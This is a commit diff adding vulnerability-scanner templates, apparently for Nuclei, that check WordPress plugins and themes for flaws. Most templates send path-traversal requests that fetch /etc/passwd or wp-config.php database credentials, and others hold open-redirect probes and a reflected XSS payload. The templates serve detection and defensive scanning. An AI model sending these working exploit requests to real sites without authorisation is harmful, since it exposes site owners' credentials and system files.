commit
7bf3ac584c
|
@ -0,0 +1,24 @@
|
|||
id: candidate-application-lfi
|
||||
|
||||
info:
|
||||
name: Candidate Application Form <= 1.3 - Unauthenticated Arbitrary File Download
|
||||
author: dhiyaneshDK
|
||||
severity: high
|
||||
description: The code in downloadpdffile.php does not do any sanity checks, allowing a remote attacker to download sensitive system files.
|
||||
reference: https://wpscan.com/vulnerability/446233e9-33b3-4024-9b7d-63f9bb1dafe0
|
||||
tags: wordpress,wp-plugin,lfi,wp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,29 @@
|
|||
id: cherry-lfi
|
||||
|
||||
info:
|
||||
name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Upload and Download
|
||||
author: dhiyaneshDK
|
||||
severity: high
|
||||
description: The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee
|
||||
- https://support.alertlogic.com/hc/en-us/articles/115003048083-06-19-17-WordPress-CMS-Cherry-Plugin-Arbitrary-File-Upload-RCE
|
||||
tags: wordpress,wp-plugin,lfi,wp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "DB_NAME"
|
||||
- "DB_PASSWORD"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: churchope-lfi
|
||||
|
||||
info:
|
||||
name: ChurcHope Theme <= 2.1 - Local File Inclusion (LFI)
|
||||
author: dhiyaneshDK
|
||||
severity: high
|
||||
description: The vulnerability is caused by improper filtration of user-supplied input passed via the 'file' HTTP GET parameter to the '/lib/downloadlink.php' script, which is publicly accessible.
|
||||
reference: https://wpscan.com/vulnerability/3c5833bd-1fe0-4eba-97aa-7d3a0c8fda15
|
||||
tags: wordpress,wp-theme,lfi,wp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "DB_NAME"
|
||||
- "DB_PASSWORD"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,29 @@
|
|||
id: db-backup-lfi
|
||||
|
||||
info:
|
||||
name: DB Backup <= 4.5 - Path Traversal File Access
|
||||
author: dhiyaneshDK
|
||||
severity: high
|
||||
description: WordPress Plugin DB Backup is prone to a directory traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin DB Backup version 4.5 is vulnerable; prior versions may also be affected.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536
|
||||
- https://www.exploit-db.com/exploits/35378
|
||||
tags: wordpress,wp-plugin,lfi,wp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "DB_NAME"
|
||||
- "DB_PASSWORD"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,43 @@
|
|||
id: elementorpage-open-redirect
|
||||
|
||||
info:
|
||||
name: The Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect
|
||||
author: dhiyaneshDk
|
||||
severity: medium
|
||||
description: The plugin did not validate a redirect parameter on a specifically crafted URL before redirecting the user to it, leading to an Open Redirect issue.
|
||||
reference: https://wpscan.com/vulnerability/fd4352ad-dae0-4404-94d1-11083cb1f44d
|
||||
tags: wordpress,redirect,wp-plugin,elementor,wp
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /?author=1 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /wp-login.php?action=theplusrp&key=&redirecturl=http://attacker.com&forgoturl=http://attacker.com&login={{username}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
redirects: true
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
name: username
|
||||
internal: true
|
||||
group: 1
|
||||
regex:
|
||||
- 'Author:(?:[A-Za-z0-9 -\_="]+)?<span(?:[A-Za-z0-9 -\_="]+)?>([A-Za-z0-9]+)<\/span>'
|
||||
|
||||
- type: regex
|
||||
part: header
|
||||
name: username
|
||||
internal: true
|
||||
group: 1
|
||||
regex:
|
||||
- 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/'
|
|
@ -0,0 +1,20 @@
|
|||
id: eventtickets-open-redirect
|
||||
|
||||
info:
|
||||
name: Event Tickets < 5.2.2 - Open Redirect
|
||||
author: dhiyaneshDk
|
||||
severity: low
|
||||
description: The plugin does not validate the tribe_tickets_redirect_to parameter before redirecting the user to the given value, leading to an arbitrary redirect issue
|
||||
reference: https://wpscan.com/vulnerability/80b0682e-2c3b-441b-9628-6462368e5fc7
|
||||
tags: wordpress,redirect,wp-plugin,eventtickets,wp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
@ -0,0 +1,28 @@
|
|||
id: hb-audio-lfi
|
||||
|
||||
info:
|
||||
name: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Download
|
||||
author: dhiyaneshDK
|
||||
severity: high
|
||||
reference: https://packetstormsecurity.com/files/136340/WordPress-HB-Audio-Gallery-Lite-1.0.0-Arbitrary-File-Download.html
|
||||
metadata:
|
||||
google-dork: inurl:/wp-content/plugins/hb-audio-gallery-lite
|
||||
tags: wordpress,wp-plugin,lfi,wp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "DB_NAME"
|
||||
- "DB_PASSWORD"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: hide-security-enhancer-lfi
|
||||
|
||||
info:
|
||||
name: WP Hide Security Enhancer 1.3.9.2 - Arbitrary File Download Vulnerability
|
||||
author: dhiyaneshDK
|
||||
severity: high
|
||||
description: WP Hide Security Enhancer version 1.3.9.2 or less is victim of an Arbitrary File Download vulnerability. This allows any visitor to download any file in our installation
|
||||
reference: https://secupress.me/blog/arbitrary-file-download-vulnerability-in-wp-hide-security-enhancer-1-3-9-2/
|
||||
tags: wordpress,wp-plugin,lfi,wp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "DB_NAME"
|
||||
- "DB_PASSWORD"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,24 @@
|
|||
id: music-store-open-redirect
|
||||
|
||||
info:
|
||||
name: Music Store <= 1.0.14 - Referer Header Open Redirect
|
||||
author: dhiyaneshDk
|
||||
severity: medium
|
||||
description: The Music Store – WordPress eCommerce WordPress plugin was affected by a Referer Header Open Redirect security vulnerability.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/d73f6575-eb86-480c-bde1-f8765870cdd1
|
||||
- https://seclists.org/fulldisclosure/2015/Jul/113
|
||||
tags: wordpress,redirect,wp-plugin,musicstore,wp
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Referer: https://example.com
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
@ -0,0 +1,20 @@
|
|||
id: newsletter-open-redirect
|
||||
|
||||
info:
|
||||
name: Newsletter Manager < 1.5 - Unauthenticated Open Redirect
|
||||
author: dhiyaneshDk
|
||||
severity: medium
|
||||
description: The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header() PHP function, leading to an open redirect issue.
|
||||
reference: https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1
|
||||
tags: wordpress,redirect,wp-plugin,newsletter,wp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL3d3dy5nb29nbGUuY29t"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)google\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||
part: header
|
|
@ -0,0 +1,30 @@
|
|||
id: ninjaform-open-redirect
|
||||
|
||||
info:
|
||||
name: Ninja Forms < 3.4.34 - Administrator Open Redirect
|
||||
author: dhiyaneshDk
|
||||
severity: medium
|
||||
description: The wp_ajax_nf_oauth_connect AJAX action was vulnerable to open redirect due to the use of a user supplied redirect parameter and no protection in place.
|
||||
reference: https://wpscan.com/vulnerability/6147acf5-e43f-47e6-ab56-c9c8be584818
|
||||
tags: wordpress,redirect,wp-plugin,ninjaform,wp,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
- |
|
||||
GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://google.com&action=nf_oauth_connect HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)google\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
@ -0,0 +1,22 @@
|
|||
id: noptin-open-redirect
|
||||
|
||||
info:
|
||||
name: Noptin < 1.6.5 - Open Redirect
|
||||
author: dhiyaneshDk
|
||||
severity: low
|
||||
description: The plugin does not validate the to parameter before redirecting the user to its given value, leading to an open redirect issue
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/c2d2384c-41b9-4aaf-b918-c1cfda58af5c
|
||||
- https://plugins.trac.wordpress.org/changeset/2639592
|
||||
tags: wordpress,redirect,wp-plugin,noptin,wp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/?noptin_ns=email_click&to=https://example.com"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' #https://regex101.com/r/ZDYhFh/1
|
|
@ -0,0 +1,29 @@
|
|||
id: shortcode-lfi
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Download Shortcode Local File Inclusion (0.2.3)
|
||||
author: dhiyaneshDK
|
||||
severity: high
|
||||
description: WordPress Plugin Download Shortcode is prone to a local file inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin Download Shortcode version 0.2.3 is vulnerable; prior versions may also be affected.
|
||||
reference: https://packetstormsecurity.com/files/128024/WordPress-ShortCode-1.1-Local-File-Inclusion.html
|
||||
metadata:
|
||||
google-dork: inurl:wp/wp-content/force-download.php
|
||||
tags: wordpress,wp-plugin,lfi,shortcode,wp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/force-download.php?file=../wp-config.php'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "DB_NAME"
|
||||
- "DB_PASSWORD"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,24 @@
|
|||
id: simple-image-manipulator-lfi
|
||||
|
||||
info:
|
||||
name: Simple Image Manipulator v1.0 - Remote file download
|
||||
author: dhiyaneshDK
|
||||
severity: high
|
||||
description: In ./simple-image-manipulator/controller/download.php no checks are made to authenticate user or sanitize input when determining file location.
|
||||
reference: https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html
|
||||
tags: wordpress,wp-plugin,lfi,wp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,26 @@
|
|||
id: sniplets-lfi
|
||||
|
||||
info:
|
||||
name: Wordpress Plugin Sniplets 1.1.2 - LFI
|
||||
author: dhiyaneshDK
|
||||
severity: high
|
||||
reference: https://www.exploit-db.com/exploits/5194
|
||||
tags: wordpress,wp-plugin,lfi,wp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "DB_NAME"
|
||||
- "DB_PASSWORD"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: sniplets-xss
|
||||
|
||||
info:
|
||||
name: Wordpress Plugin Sniplets - XSS
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) on Wordpress Plugin Sniplets
|
||||
reference: https://www.exploit-db.com/exploits/5194
|
||||
tags: xss,wordpress,wp-plugin,wp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,20 @@
|
|||
id: webp-coverter-open-redirect
|
||||
|
||||
info:
|
||||
name: WebP Converter for Media < 4.0.3 - Unauthenticated Open redirect
|
||||
author: dhiyaneshDk
|
||||
severity: medium
|
||||
description: The plugin contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an Open Redirect issue.
|
||||
reference: https://wpscan.com/vulnerability/f3c0a155-9563-4533-97d4-03b9bac83164
|
||||
tags: wordpress,redirect,wp-plugin,webpconverter,wp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
Loading…
Reference in New Issue